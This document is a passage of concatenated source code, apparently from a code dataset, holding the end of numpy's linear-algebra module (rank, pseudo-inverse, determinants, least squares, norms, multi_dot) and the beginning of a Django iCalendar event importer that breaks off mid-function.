columns in `M`. Computing the SVD on `M` will not produce a singular value
exactly equal to 0 in general: any difference of the smallest SVD value from
0 will be caused by numerical imprecision in the calculation of the SVD.
Our threshold for small SVD values takes this numerical imprecision into
account, and the default threshold will detect such numerical rank
deficiency. The threshold may declare a matrix `M` rank deficient even if
the linear combination of some columns of `M` is not exactly equal to
another column of `M` but only numerically very close to another column of
`M`.
We chose our default threshold because it is in wide use. Other thresholds
are possible. For example, elsewhere in the 2007 edition of *Numerical
recipes* there is an alternative threshold of ``S.max() *
np.finfo(M.dtype).eps / 2. * np.sqrt(m + n + 1.)``. The authors describe
this threshold as being based on "expected roundoff error" (p 71).
The thresholds above deal with floating point roundoff error in the
calculation of the SVD. However, you may have more information about the
sources of error in `M` that would make you consider other tolerance values
to detect *effective* rank deficiency. The most useful measure of the
tolerance depends on the operations you intend to use on your matrix. For
example, if your data come from uncertain measurements with uncertainties
greater than floating point epsilon, choosing a tolerance near that
uncertainty may be preferable. The tolerance may be absolute if the
uncertainties are absolute rather than relative.
References
----------
.. [1] MATLAB reference documention, "Rank"
http://www.mathworks.com/help/techdoc/ref/rank.html
.. [2] W. H. Press, S. A. Teukolsky, W. T. Vetterling and B. P. Flannery,
"Numerical Recipes (3rd edition)", Cambridge University Press, 2007,
page 795.
Examples
--------
>>> from numpy.linalg import matrix_rank
>>> matrix_rank(np.eye(4)) # Full rank matrix
4
>>> I=np.eye(4); I[-1,-1] = 0. # rank deficient matrix
>>> matrix_rank(I)
3
>>> matrix_rank(np.ones((4,))) # 1 dimension - rank 1 unless all 0
1
>>> matrix_rank(np.zeros((4,)))
0
"""
M = asarray(M)
if M.ndim < 2:
return int(not all(M==0))
S = svd(M, compute_uv=False)
if tol is None:
tol = S.max(axis=-1, keepdims=True) * max(M.shape[-2:]) * finfo(S.dtype).eps
return (S > tol).sum(axis=-1)
# Generalized inverse
def pinv(a, rcond=1e-15 ):
"""
Compute the (Moore-Penrose) pseudo-inverse of a matrix.
Calculate the generalized inverse of a matrix using its
singular-value decomposition (SVD) and including all
*large* singular values.
Parameters
----------
a : (M, N) array_like
Matrix to be pseudo-inverted.
rcond : float
Cutoff for small singular values.
Singular values smaller (in modulus) than
`rcond` * largest_singular_value (again, in modulus)
are set to zero.
Returns
-------
B : (N, M) ndarray
The pseudo-inverse of `a`. If `a` is a `matrix` instance, then so
is `B`.
Raises
------
LinAlgError
If the SVD computation does not converge.
Notes
-----
The pseudo-inverse of a matrix A, denoted :math:`A^+`, is
defined as: "the matrix that 'solves' [the least-squares problem]
:math:`Ax = b`," i.e., if :math:`\\bar{x}` is said solution, then
:math:`A^+` is that matrix such that :math:`\\bar{x} = A^+b`.
It can be shown that if :math:`Q_1 \\Sigma Q_2^T = A` is the singular
value decomposition of A, then
:math:`A^+ = Q_2 \\Sigma^+ Q_1^T`, where :math:`Q_{1,2}` are
orthogonal matrices, :math:`\\Sigma` is a diagonal matrix consisting
of A's so-called singular values, (followed, typically, by
zeros), and then :math:`\\Sigma^+` is simply the diagonal matrix
consisting of the reciprocals of A's singular values
(again, followed by zeros). [1]_
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando,
FL, Academic Press, Inc., 1980, pp. 139-142.
Examples
--------
The following example checks that ``a * a+ * a == a`` and
``a+ * a * a+ == a+``:
>>> a = np.random.randn(9, 6)
>>> B = np.linalg.pinv(a)
>>> np.allclose(a, np.dot(a, np.dot(B, a)))
True
>>> np.allclose(B, np.dot(B, np.dot(a, B)))
True
"""
a, wrap = _makearray(a)
if _isEmpty2d(a):
res = empty(a.shape[:-2] + (a.shape[-1], a.shape[-2]), dtype=a.dtype)
return wrap(res)
a = a.conjugate()
u, s, vt = svd(a, 0)
m = u.shape[0]
n = vt.shape[1]
cutoff = rcond*maximum.reduce(s)
for i in range(min(n, m)):
if s[i] > cutoff:
s[i] = 1./s[i]
else:
s[i] = 0.
res = dot(transpose(vt), multiply(s[:, newaxis], transpose(u)))
return wrap(res)
# Determinant
def slogdet(a):
"""
Compute the sign and (natural) logarithm of the determinant of an array.
If an array has a very small or very large determinant, then a call to
`det` may overflow or underflow. This routine is more robust against such
issues, because it computes the logarithm of the determinant rather than
the determinant itself.
Parameters
----------
a : (..., M, M) array_like
Input array, has to be a square 2-D array.
Returns
-------
sign : (...) array_like
A number representing the sign of the determinant. For a real matrix,
this is 1, 0, or -1. For a complex matrix, this is a complex number
with absolute value 1 (i.e., it is on the unit circle), or else 0.
logdet : (...) array_like
The natural log of the absolute value of the determinant.
If the determinant is zero, then `sign` will be 0 and `logdet` will be
-Inf. In all cases, the determinant is equal to ``sign * np.exp(logdet)``.
See Also
--------
det
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
.. versionadded:: 1.6.0
The determinant is computed via LU factorization using the LAPACK
routine z/dgetrf.
Examples
--------
The determinant of a 2-D array ``[[a, b], [c, d]]`` is ``ad - bc``:
>>> a = np.array([[1, 2], [3, 4]])
>>> (sign, logdet) = np.linalg.slogdet(a)
>>> (sign, logdet)
(-1, 0.69314718055994529)
>>> sign * np.exp(logdet)
-2.0
Computing log-determinants for a stack of matrices:
>>> a = np.array([ [[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]] ])
>>> a.shape
(3, 2, 2)
>>> sign, logdet = np.linalg.slogdet(a)
>>> (sign, logdet)
(array([-1., -1., -1.]), array([ 0.69314718, 1.09861229, 2.07944154]))
>>> sign * np.exp(logdet)
array([-2., -3., -8.])
This routine succeeds where ordinary `det` does not:
>>> np.linalg.det(np.eye(500) * 0.1)
0.0
>>> np.linalg.slogdet(np.eye(500) * 0.1)
(1, -1151.2925464970228)
"""
a = asarray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
real_t = _realType(result_t)
if _isEmpty2d(a):
# determinant of empty matrix is 1
sign = ones(a.shape[:-2], dtype=result_t)
logdet = zeros(a.shape[:-2], dtype=real_t)
return sign, logdet
signature = 'D->Dd' if isComplexType(t) else 'd->dd'
sign, logdet = _umath_linalg.slogdet(a, signature=signature)
if isscalar(sign):
sign = sign.astype(result_t)
else:
sign = sign.astype(result_t, copy=False)
if isscalar(logdet):
logdet = logdet.astype(real_t)
else:
logdet = logdet.astype(real_t, copy=False)
return sign, logdet
def det(a):
"""
Compute the determinant of an array.
Parameters
----------
a : (..., M, M) array_like
Input array to compute determinants for.
Returns
-------
det : (...) array_like
Determinant of `a`.
See Also
--------
slogdet : Another way to representing the determinant, more suitable
for large matrices where underflow/overflow may occur.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The determinant is computed via LU factorization using the LAPACK
routine z/dgetrf.
Examples
--------
The determinant of a 2-D array [[a, b], [c, d]] is ad - bc:
>>> a = np.array([[1, 2], [3, 4]])
>>> np.linalg.det(a)
-2.0
Computing determinants for a stack of matrices:
>>> a = np.array([ [[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]] ])
>>> a.shape
(3, 2, 2)
>>> np.linalg.det(a)
array([-2., -3., -8.])
"""
a = asarray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
# 0x0 matrices have determinant 1
if _isEmpty2d(a):
return ones(a.shape[:-2], dtype=result_t)
signature = 'D->D' if isComplexType(t) else 'd->d'
r = _umath_linalg.det(a, signature=signature)
if isscalar(r):
r = r.astype(result_t)
else:
r = r.astype(result_t, copy=False)
return r
# Linear Least Squares
def lstsq(a, b, rcond=-1):
"""
Return the least-squares solution to a linear matrix equation.
Solves the equation `a x = b` by computing a vector `x` that
minimizes the Euclidean 2-norm `|| b - a x ||^2`. The equation may
be under-, well-, or over- determined (i.e., the number of
linearly independent rows of `a` can be less than, equal to, or
greater than its number of linearly independent columns). If `a`
is square and of full rank, then `x` (but for round-off error) is
the "exact" solution of the equation.
Parameters
----------
a : (M, N) array_like
"Coefficient" matrix.
b : {(M,), (M, K)} array_like
Ordinate or "dependent variable" values. If `b` is two-dimensional,
the least-squares solution is calculated for each of the `K` columns
of `b`.
rcond : float, optional
Cut-off ratio for small singular values of `a`.
For the purposes of rank determination, singular values are treated
as zero if they are smaller than `rcond` times the largest singular
value of `a`.
Returns
-------
x : {(N,), (N, K)} ndarray
Least-squares solution. If `b` is two-dimensional,
the solutions are in the `K` columns of `x`.
residuals : {(), (1,), (K,)} ndarray
Sums of residuals; squared Euclidean 2-norm for each column in
``b - a*x``.
If the rank of `a` is < N or M <= N, this is an empty array.
If `b` is 1-dimensional, this is a (1,) shape array.
Otherwise the shape is (K,).
rank : int
Rank of matrix `a`.
s : (min(M, N),) ndarray
Singular values of `a`.
Raises
------
LinAlgError
If computation does not converge.
Notes
-----
If `b` is a matrix, then all array results are returned as matrices.
Examples
--------
Fit a line, ``y = mx + c``, through some noisy data-points:
>>> x = np.array([0, 1, 2, 3])
>>> y = np.array([-1, 0.2, 0.9, 2.1])
By examining the coefficients, we see that the line should have a
gradient of roughly 1 and cut the y-axis at, more or less, -1.
We can rewrite the line equation as ``y = Ap``, where ``A = [[x 1]]``
and ``p = [[m], [c]]``. Now use `lstsq` to solve for `p`:
>>> A = np.vstack([x, np.ones(len(x))]).T
>>> A
array([[ 0., 1.],
[ 1., 1.],
[ 2., 1.],
[ 3., 1.]])
>>> m, c = np.linalg.lstsq(A, y)[0]
>>> print(m, c)
1.0 -0.95
Plot the data along with the fitted line:
>>> import matplotlib.pyplot as plt
>>> plt.plot(x, y, 'o', label='Original data', markersize=10)
>>> plt.plot(x, m*x + c, 'r', label='Fitted line')
>>> plt.legend()
>>> plt.show()
"""
import math
a, _ = _makearray(a)
b, wrap = _makearray(b)
is_1d = b.ndim == 1
if is_1d:
b = b[:, newaxis]
_assertRank2(a, b)
_assertNoEmpty2d(a, b) # TODO: relax this constraint
m = a.shape[0]
n = a.shape[1]
n_rhs = b.shape[1]
ldb = max(n, m)
if m != b.shape[0]:
raise LinAlgError('Incompatible dimensions')
t, result_t = _commonType(a, b)
result_real_t = _realType(result_t)
real_t = _linalgRealType(t)
bstar = zeros((ldb, n_rhs), t)
bstar[:b.shape[0], :n_rhs] = b.copy()
a, bstar = _fastCopyAndTranspose(t, a, bstar)
a, bstar = _to_native_byte_order(a, bstar)
s = zeros((min(m, n),), real_t)
# This line:
# * is incorrect, according to the LAPACK documentation
# * raises a ValueError if min(m,n) == 0
# * should not be calculated here anyway, as LAPACK should calculate
# `liwork` for us. But that only works if our version of lapack does
# not have this bug:
# http://icl.cs.utk.edu/lapack-forum/archives/lapack/msg00899.html
# Lapack_lite does have that bug...
nlvl = max( 0, int( math.log( float(min(m, n))/2. ) ) + 1 )
iwork = zeros((3*min(m, n)*nlvl+11*min(m, n),), fortran_int)
if isComplexType(t):
lapack_routine = lapack_lite.zgelsd
lwork = 1
rwork = zeros((lwork,), real_t)
work = zeros((lwork,), t)
results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
0, work, -1, rwork, iwork, 0)
lwork = int(abs(work[0]))
rwork = zeros((lwork,), real_t)
a_real = zeros((m, n), real_t)
bstar_real = zeros((ldb, n_rhs,), real_t)
results = lapack_lite.dgelsd(m, n, n_rhs, a_real, m,
bstar_real, ldb, s, rcond,
0, rwork, -1, iwork, 0)
lrwork = int(rwork[0])
work = zeros((lwork,), t)
rwork = zeros((lrwork,), real_t)
results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
0, work, lwork, rwork, iwork, 0)
else:
lapack_routine = lapack_lite.dgelsd
lwork = 1
work = zeros((lwork,), t)
results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
0, work, -1, iwork, 0)
lwork = int(work[0])
work = zeros((lwork,), t)
results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
0, work, lwork, iwork, 0)
if results['info'] > 0:
raise LinAlgError('SVD did not converge in Linear Least Squares')
resids = array([], result_real_t)
if is_1d:
x = array(ravel(bstar)[:n], dtype=result_t, copy=True)
if results['rank'] == n and m > n:
if isComplexType(t):
resids = array([sum(abs(ravel(bstar)[n:])**2)],
dtype=result_real_t)
else:
resids = array([sum((ravel(bstar)[n:])**2)],
dtype=result_real_t)
else:
x = array(transpose(bstar)[:n,:], dtype=result_t, copy=True)
if results['rank'] == n and m > n:
if isComplexType(t):
resids = sum(abs(transpose(bstar)[n:,:])**2, axis=0).astype(
result_real_t, copy=False)
else:
resids = sum((transpose(bstar)[n:,:])**2, axis=0).astype(
result_real_t, copy=False)
st = s[:min(n, m)].astype(result_real_t, copy=True)
return wrap(x), wrap(resids), results['rank'], st
def _multi_svd_norm(x, row_axis, col_axis, op):
"""Compute a function of the singular values of the 2-D matrices in `x`.
This is a private utility function used by numpy.linalg.norm().
Parameters
----------
x : ndarray
row_axis, col_axis : int
The axes of `x` that hold the 2-D matrices.
op : callable
This should be either numpy.amin or numpy.amax or numpy.sum.
Returns
-------
result : float or ndarray
If `x` is 2-D, the return values is a float.
Otherwise, it is an array with ``x.ndim - 2`` dimensions.
The return values are either the minimum or maximum or sum of the
singular values of the matrices, depending on whether `op`
is `numpy.amin` or `numpy.amax` or `numpy.sum`.
"""
if row_axis > col_axis:
row_axis -= 1
y = rollaxis(rollaxis(x, col_axis, x.ndim), row_axis, -1)
result = op(svd(y, compute_uv=0), axis=-1)
return result
def norm(x, ord=None, axis=None, keepdims=False):
"""
Matrix or vector norm.
This function is able to return one of eight different matrix norms,
or one of an infinite number of vector norms (described below), depending
on the value of the ``ord`` parameter.
Parameters
----------
x : array_like
Input array. If `axis` is None, `x` must be 1-D or 2-D.
ord : {non-zero int, inf, -inf, 'fro', 'nuc'}, optional
Order of the norm (see table under ``Notes``). inf means numpy's
`inf` object.
axis : {int, 2-tuple of ints, None}, optional
If `axis` is an integer, it specifies the axis of `x` along which to
compute the vector norms. If `axis` is a 2-tuple, it specifies the
axes that hold 2-D matrices, and the matrix norms of these matrices
are computed. If `axis` is None then either a vector norm (when `x`
is 1-D) or a matrix norm (when `x` is 2-D) is returned.
keepdims : bool, optional
If this is set to True, the axes which are normed over are left in the
result as dimensions with size one. With this option the result will
broadcast correctly against the original `x`.
.. versionadded:: 1.10.0
Returns
-------
n : float or ndarray
Norm of the matrix or vector(s).
Notes
-----
For values of ``ord <= 0``, the result is, strictly speaking, not a
mathematical 'norm', but it may still be useful for various numerical
purposes.
The following norms can be calculated:
===== ============================ ==========================
ord norm for matrices norm for vectors
===== ============================ ==========================
None Frobenius norm 2-norm
'fro' Frobenius norm --
'nuc' nuclear norm --
inf max(sum(abs(x), axis=1)) max(abs(x))
-inf min(sum(abs(x), axis=1)) min(abs(x))
0 -- sum(x != 0)
1 max(sum(abs(x), axis=0)) as below
-1 min(sum(abs(x), axis=0)) as below
2 2-norm (largest sing. value) as below
-2 smallest singular value as below
other -- sum(abs(x)**ord)**(1./ord)
===== ============================ ==========================
The Frobenius norm is given by [1]_:
:math:`||A||_F = [\\sum_{i,j} abs(a_{i,j})^2]^{1/2}`
The nuclear norm is the sum of the singular values.
References
----------
.. [1] G. H. Golub and C. F. Van Loan, *Matrix Computations*,
Baltimore, MD, Johns Hopkins University Press, 1985, pg. 15
Examples
--------
>>> from numpy import linalg as LA
>>> a = np.arange(9) - 4
>>> a
array([-4, -3, -2, -1, 0, 1, 2, 3, 4])
>>> b = a.reshape((3, 3))
>>> b
array([[-4, -3, -2],
[-1, 0, 1],
[ 2, 3, 4]])
>>> LA.norm(a)
7.745966692414834
>>> LA.norm(b)
7.745966692414834
>>> LA.norm(b, 'fro')
7.745966692414834
>>> LA.norm(a, np.inf)
4.0
>>> LA.norm(b, np.inf)
9.0
>>> LA.norm(a, -np.inf)
0.0
>>> LA.norm(b, -np.inf)
2.0
>>> LA.norm(a, 1)
20.0
>>> LA.norm(b, 1)
7.0
>>> LA.norm(a, -1)
-4.6566128774142013e-010
>>> LA.norm(b, -1)
6.0
>>> LA.norm(a, 2)
7.745966692414834
>>> LA.norm(b, 2)
7.3484692283495345
>>> LA.norm(a, -2)
nan
>>> LA.norm(b, -2)
1.8570331885190563e-016
>>> LA.norm(a, 3)
5.8480354764257312
>>> LA.norm(a, -3)
nan
Using the `axis` argument to compute vector norms:
>>> c = np.array([[ 1, 2, 3],
... [-1, 1, 4]])
>>> LA.norm(c, axis=0)
array([ 1.41421356, 2.23606798, 5. ])
>>> LA.norm(c, axis=1)
array([ 3.74165739, 4.24264069])
>>> LA.norm(c, ord=1, axis=1)
array([ 6., 6.])
Using the `axis` argument to compute matrix norms:
>>> m = np.arange(8).reshape(2,2,2)
>>> LA.norm(m, axis=(1,2))
array([ 3.74165739, 11.22497216])
>>> LA.norm(m[0, :, :]), LA.norm(m[1, :, :])
(3.7416573867739413, 11.224972160321824)
"""
x = asarray(x)
if not issubclass(x.dtype.type, (inexact, object_)):
x = x.astype(float)
# Immediately handle some default, simple, fast, and common cases.
if axis is None:
ndim = x.ndim
if ((ord is None) or
(ord in ('f', 'fro') and ndim == 2) or
(ord == 2 and ndim == 1)):
x = x.ravel(order='K')
if isComplexType(x.dtype.type):
sqnorm = dot(x.real, x.real) + dot(x.imag, x.imag)
else:
sqnorm = dot(x, x)
ret = sqrt(sqnorm)
if keepdims:
ret = ret.reshape(ndim*[1])
return ret
# Normalize the `axis` argument to a tuple.
nd = x.ndim
if axis is None:
axis = tuple(range(nd))
elif not isinstance(axis, tuple):
try:
axis = int(axis)
except:
raise TypeError("'axis' must be None, an integer or a tuple of integers")
axis = (axis,)
if len(axis) == 1:
if ord == Inf:
return abs(x).max(axis=axis, keepdims=keepdims)
elif ord == -Inf:
return abs(x).min(axis=axis, keepdims=keepdims)
elif ord == 0:
# Zero norm
return (x != 0).astype(float).sum(axis=axis, keepdims=keepdims)
elif ord == 1:
# special case for speedup
return add.reduce(abs(x), axis=axis, keepdims=keepdims)
elif ord is None or ord == 2:
# special case for speedup
s = (x.conj() * x).real
return sqrt(add.reduce(s, axis=axis, keepdims=keepdims))
else:
try:
ord + 1
except TypeError:
raise ValueError("Invalid norm order for vectors.")
if x.dtype.type is longdouble:
# Convert to a float type, so integer arrays give
# float results. Don't apply asfarray to longdouble arrays,
# because it will downcast to float64.
absx = abs(x)
else:
absx = x if isComplexType(x.dtype.type) else asfarray(x)
if absx.dtype is x.dtype:
absx = abs(absx)
else:
# if the type changed, we can safely overwrite absx
abs(absx, out=absx)
absx **= ord
return add.reduce(absx, axis=axis, keepdims=keepdims) ** (1.0 / ord)
elif len(axis) == 2:
row_axis, col_axis = axis
row_axis = normalize_axis_index(row_axis, nd)
col_axis = normalize_axis_index(col_axis, nd)
if row_axis == col_axis:
raise ValueError('Duplicate axes given.')
if ord == 2:
ret = _multi_svd_norm(x, row_axis, col_axis, amax)
elif ord == -2:
ret = _multi_svd_norm(x, row_axis, col_axis, amin)
elif ord == 1:
if col_axis > row_axis:
col_axis -= 1
ret = add.reduce(abs(x), axis=row_axis).max(axis=col_axis)
elif ord == Inf:
if row_axis > col_axis:
row_axis -= 1
ret = add.reduce(abs(x), axis=col_axis).max(axis=row_axis)
elif ord == -1:
if col_axis > row_axis:
col_axis -= 1
ret = add.reduce(abs(x), axis=row_axis).min(axis=col_axis)
elif ord == -Inf:
if row_axis > col_axis:
row_axis -= 1
ret = add.reduce(abs(x), axis=col_axis).min(axis=row_axis)
elif ord in [None, 'fro', 'f']:
ret = sqrt(add.reduce((x.conj() * x).real, axis=axis))
elif ord == 'nuc':
ret = _multi_svd_norm(x, row_axis, col_axis, sum)
else:
raise ValueError("Invalid norm order for matrices.")
if keepdims:
ret_shape = list(x.shape)
ret_shape[axis[0]] = 1
ret_shape[axis[1]] = 1
ret = ret.reshape(ret_shape)
return ret
else:
raise ValueError("Improper number of dimensions to norm.")
# multi_dot
def multi_dot(arrays):
"""
Compute the dot product of two or more arrays in a single function call,
while automatically selecting the fastest evaluation order.
`multi_dot` chains `numpy.dot` and uses optimal parenthesization
of the matrices [1]_ [2]_. Depending on the shapes of the matrices,
this can speed up the multiplication a lot.
If the first argument is 1-D it is treated as a row vector.
If the last argument is 1-D it is treated as a column vector.
The other arguments must be 2-D.
Think of `multi_dot` as::
def multi_dot(arrays): return functools.reduce(np.dot, arrays)
Parameters
----------
arrays : sequence of array_like
If the first argument is 1-D it is treated as row vector.
If the last argument is 1-D it is treated as column vector.
The other arguments must be 2-D.
Returns
-------
output : ndarray
Returns the dot product of the supplied arrays.
See Also
--------
dot : dot multiplication with two arguments.
References
----------
.. [1] Cormen, "Introduction to Algorithms", Chapter 15.2, p. 370-378
.. [2] http://en.wikipedia.org/wiki/Matrix_chain_multiplication
Examples
--------
`multi_dot` allows you to write::
>>> from numpy.linalg import multi_dot
>>> # Prepare some data
>>> A = np.random.random(10000, 100)
>>> B = np.random.random(100, 1000)
>>> C = np.random.random(1000, 5)
>>> D = np.random.random(5, 333)
>>> # the actual dot multiplication
>>> multi_dot([A, B, C, D])
instead of::
>>> np.dot(np.dot(np.dot(A, B), C), D)
>>> # or
>>> A.dot(B).dot(C).dot(D)
Notes
-----
The cost for a matrix multiplication can be calculated with the
following function::
def cost(A, B):
return A.shape[0] * A.shape[1] * B.shape[1]
Let's assume we have three matrices
:math:`A_{10x100}, B_{100x5}, C_{5x50}$`.
The costs for the two different parenthesizations are as follows::
cost((AB)C) = 10*100*5 + 10*5*50 = 5000 + 2500 = 7500
cost(A(BC)) = 10*100*50 + 100*5*50 = 50000 + 25000 = 75000
"""
n = len(arrays)
# optimization only makes sense for len(arrays) > 2
if n < 2:
raise ValueError("Expecting at least two arrays.")
elif n == 2:
return dot(arrays[0], arrays[1])
arrays = [asanyarray(a) for a in arrays]
# save original ndim to reshape the result array into the proper form later
ndim_first, ndim_last = arrays[0].ndim, arrays[-1].ndim
# Explicitly convert vectors to 2D arrays to keep the logic of the internal
# _multi_dot_* functions as simple as possible.
if arrays[0].ndim == 1:
arrays[0] = atleast_2d(arrays[0])
if arrays[-1].ndim == 1:
arrays[-1] = atleast_2d(arrays[-1]).T
_assertRank2(*arrays)
# _multi_dot_three is much faster than _multi_dot_matrix_chain_order
if n == 3:
result = _multi_dot_three(arrays[0], arrays[1], arrays[2])
else:
order = _multi_dot_matrix_chain_order(arrays)
result = _multi_dot(arrays, order, 0, n - 1)
# return proper shape
if ndim_first == 1 and ndim_last == 1:
return result[0, 0] # scalar
elif ndim_first == 1 or ndim_last == 1:
return result.ravel() # 1-D
else:
return result
def _multi_dot_three(A, B, C):
"""
Find the best order for three arrays and do the multiplication.
For three arguments `_multi_dot_three` is approximately 15 times faster
than `_multi_dot_matrix_chain_order`
"""
a0, a1b0 = A.shape
b1c0, c1 = C.shape
# cost1 = cost((AB)C) = a0*a1b0*b1c0 + a0*b1c0*c1
cost1 = a0 * b1c0 * (a1b0 + c1)
# cost2 = cost(A(BC)) = a1b0*b1c0*c1 + a0*a1b0*c1
cost2 = a1b0 * c1 * (a0 + b1c0)
if cost1 < cost2:
return dot(dot(A, B), C)
else:
return dot(A, dot(B, C))
def _multi_dot_matrix_chain_order(arrays, return_costs=False):
"""
Return a np.array that encodes the optimal order of mutiplications.
The optimal order array is then used by `_multi_dot()` to do the
multiplication.
Also return the cost matrix if `return_costs` is `True`
The implementation CLOSELY follows Cormen, "Introduction to Algorithms",
Chapter 15.2, p. 370-378. Note that Cormen uses 1-based indices.
cost[i, j] = min([
cost[prefix] + cost[suffix] + cost_mult(prefix, suffix)
for k in range(i, j)])
"""
n = len(arrays)
# p stores the dimensions of the matrices
# Example for p: A_{10x100}, B_{100x5}, C_{5x50} --> p = [10, 100, 5, 50]
p = [a.shape[0] for a in arrays] + [arrays[-1].shape[1]]
# m is a matrix of costs of the subproblems
# m[i,j]: min number of scalar multiplications needed to compute A_{i..j}
m = zeros((n, n), dtype=double)
# s is the actual ordering
# s[i, j] is the value of k at which we split the product A_i..A_j
s = empty((n, n), dtype=intp)
for l in range(1, n):
for i in range(n - l):
j = i + l
m[i, j] = Inf
for k in range(i, j):
q = m[i, k] + m[k+1, j] + p[i]*p[k+1]*p[j+1]
if q < m[i, j]:
m[i, j] = q
s[i, j] = k # Note that Cormen uses 1-based index
return (s, m) if return_costs else s
def _multi_dot(arrays, order, i, j):
"""Actually do the multiplication with the given order."""
if i == j:
return arrays[i]
else:
return dot(_multi_dot(arrays, order, i, order[i, j]),
_multi_dot(arrays, order, order[i, j] + 1, j))
| behzadnouri/numpy | numpy/linalg/linalg.py | Python | bsd-3-clause | 78,778 |
from datetime import datetime, date, time
from HTMLParser import HTMLParser
import random
import urllib2
from django.conf import settings
from django.db import transaction
from django.db.models import Q
from django.utils import timezone
from icalendar import Calendar
import pytz
from wprevents.events.models import Event, Space, FunctionalArea, EVENT_TITLE_LENGTH
from wprevents.base.tasks import generate_event_instances
from recurrence import *
from dateutil.rrule import rruleset, rrulestr
class EventImporterError(Exception):
pass
class EventImporter:
def __init__(self, space=None):
self.space = space
self.spaces = Space.objects.all()
def from_url(self, url):
return self.from_string(self.fetch_url(url))
def from_string(self, data):
cal = self.parse_data(self.sanitize(data))
try:
events, skipped = self.bulk_create_events(cal)
generate_event_instances.delay()
except transaction.TransactionManagementError, e:
transaction.rollback()
raise EventImporterError('An error with the database transaction occured while bulk inserting events: ' + str(e))
except Exception, e:
raise EventImporterError('An error occurred while bulk inserting events: ' + str(e))
return events, skipped
def fetch_url(self, url):
try:
request = urllib2.Request(url)
response = urllib2.urlopen(request)
except urllib2.URLError, e:
raise EventImporterError('URL: error' + str(e.reason))
except urllib2.HTTPError, e:
raise EventImporterError('HTTP error: ' + str(e.code))
data = response.read().decode('utf-8')
return data
def sanitize(self, data):
data = data.replace(u"", "") # Temp fix for Mozilla remo ICS file
return data
def parse_data(self, data):
try:
cal = Calendar.from_ical(data)
except ValueError:
raise EventImporterError('Error parsing icalendar file. The file may contain invalid characters.')
return cal
@transaction.commit_manually
def bulk_create_events(self, cal):
ical_events = [e for e in cal.walk('VEVENT')]
duplicate_candidates = self.find_duplicate_candidates(ical_events)
# Temporary bulk_id used to fetch back newly created events
bulk_id = random.randrange(1000000000)
# Prepare batch create by looping through ical events, filtering out duplicates
events_to_create = []
recurrences = []
skipped = 0
for ical_event in ical_events:
title = HTMLParser().unescape(ical_event.get('summary'))
title = title[:EVENT_TITLE_LENGTH] # Truncate to avoid potential errors
location = ical_event.get('location', '')
description = ical_event.get('description', '')
description = HTMLParser().unescape(description).encode('utf-8')
if self.space is None:
# Auto-detection is disabled for now
# (Space field in import modal is required=True)
space = self.guess_space(location)
else:
space = self.space
start = self.convert_datetime(ical_event.get('dtstart').dt, space)
end = self.convert_datetime(ical_event.get('dtend').dt, space)
# We always want to store datetimes as UTC
start = timezone.make_naive(start, pytz.utc)
end = timezone.make_naive(end, pytz.utc)
# Filter out duplicate events
if any(self.is_duplicate(e, start, title, space) for e in duplicate_candidates):
skipped += 1
continue
event = Event(
start = start,
end = end,
space = space,
title = title,
description = description,
bulk_id = bulk_id
)
# Generate slug because django's bulk_create() does not call Event.save(),
# which is where an Event's slug is normally set
event.define_slug()
# Also update start and end datetimes in local time (relative to space)
event.update_local_datetimes()
events_to_create.append(event)
recurrences.append(self.get_recurrence(ical_event, event))
# Bulk create and instantly retrieve events, and remove bulk_id
Event.objects.bulk_create(events_to_create)
created_events = Event.objects.filter(bulk_id=bulk_id)
# Bulk update any functional areas of all these newly created events
FunctionalAreaRelations = Event.areas.through
relations = []
areas = FunctionalArea.objects.all()
for i, event in enumerate(created_events):
if recurrences[i] is not None:
event.recurrence = recurrences[i]
event.save()
for area in self.guess_functional_areas(event.description, areas):
relations.append(FunctionalAreaRelations(event_id=event.pk, functionalarea_id=area.pk))
FunctionalAreaRelations.objects.bulk_create(relations)
Event.objects.filter(bulk_id=bulk_id).update(bulk_id=None);
transaction.commit()
return created_events, skipped
def guess_space(self, location):
"""
Guess an existing Space from a string containing a raw event location
"""
guessed_space = [s for s in self.spaces if s.name.lower() in location.lower()]
return guessed_space[0] if guessed_space else None
def guess_functional_areas(self, description, functional_areas):
guessed_areas = [a for a in functional_areas if a.name.lower() in description.lower()]
return guessed_areas
def convert_datetime(self, dt, space):
if isinstance(dt, date) and not isinstance(dt, datetime):
# If there is no time specified for this dt,
# convert it to a datetime object with a time set to 00:00
dt = datetime.combine(dt, time(0, 0, 0))
if space and space.timezone:
# If the event space is known, make it local to its timezone
dt = pytz.timezone(space.timezone).localize(dt)
else:
dt = pytz.utc.localize(dt)
return dt
def find_duplicate_candidates(self, ical_events):
"""
Return all events previously added in the database that would be duplicate candidates (ie. same title, same start date) of all events provided in the
imported ical file.
"""
titles = []
start_dates = []
for ical_event in ical_events:
titles.append(ical_event.get('summary'))
if self.space is None:
space = self.guess_space(ical_event.get('location', ''))
else:
space = self.space
start = self.convert_datetime(ical_event.get('dtstart').dt, space)
start_dates.append(timezone.make_naive(start, pytz.utc))
# Dynamically build 'or' filters
filter_titles = reduce(lambda q, e: q|Q(title=e.title), titles, Q())
filter_start_dates = reduce(lambda q, date: q|Q(start=date), start_dates, Q())
return Event.objects.filter(filter_titles|filter_start_dates)
def is_duplicate(self, duplicate_candidate, start, title, space):
"""
Determine if the event given as the first argument is a duplicate
of another event that we are importing by comparing its properties
"""
e = duplicate_candidate
# Dates coming from the database are always timezone aware because
# settings.USE_TZ is True, so we must convert to a naive datetime in order
# to compare them.
naive_start_date = timezone.make_naive(e.start, pytz.utc).date()
# Start dates and titles and spaces must be identical
if naive_start_date == start.date() and e.title == title and space == e.space:
return True
return False
def get_recurrence(self, ical_event, event):
if not ical_event.get('RRULE') \
and not ical_event.get('EXRULE') \
and not ical_event.get('RDATE') \
and not ical_event.get('EXDATE'):
